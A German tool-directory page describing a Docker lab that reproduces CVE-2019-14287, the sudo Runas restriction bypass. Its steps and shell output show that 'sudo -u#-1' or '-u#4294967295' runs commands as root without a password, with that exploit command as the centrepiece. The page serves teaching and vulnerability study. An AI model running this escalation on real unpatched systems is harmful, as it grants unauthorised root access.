Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
poc-cve-2019-14287 — Docker-basierter PoC, der CVE-2019-14287 sudo-Privilegieneskalation durch Umgehung der Runas-Benutzereinschränkung demonstriert, mit Schritt-für-Schritt-Reproduktionsanweisungen | Kitploit
Tools/GitHubGitHub/lemonadern/poc-cve-2019-14287
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationLernen & BildungLabs & Praxis
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

Docker-basierter PoC, der CVE-2019-14287 sudo-Privilegieneskalation durch Umgehung der Runas-Benutzereinschränkung demonstriert, mit Schritt-für-Schritt-Reproduktionsanweisungen

Repository anzeigen
14vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC von CVE-2019-14287

Übersicht

Dies ist ein Beispiel, um die Sicherheitslücke in sudo (CVE-2019-14287) in einem Docker-Container nachzubilden.

Übungsschritte

  1. docker compose up -d, um den Container zu starten
  2. docker exec -it vulnerable_sudo_app bash, um in den Container zu gelangen
  3. Führe whoami und id aus, um zu bestätigen, dass du ein normaler Benutzer bist (nicht root)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. Stelle fest, dass sudo -u#0 whoami und sudo -u#0 id -u nicht ausgeführt werden können
    • Gib die UID 0 (root) für die Option -u an
    • Es wird nach einem Passwort gefragt, das du nicht kennst, daher kann der Befehl nicht ausgeführt werden
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. Führe sudo -u#-1 whoami und sudo -u#-1 id -u aus, um zu bestätigen, dass der Befehl ohne Authentifizierung als root ausgeführt werden kann (Nachstellung der Sicherheitslücke)
    • -u#4294967295 funktioniert ebenfalls
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

Referenzen

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • sudoの脆弱性(CVE-2019-14287)についてまとめてみた - Qiita
Tool herunterladen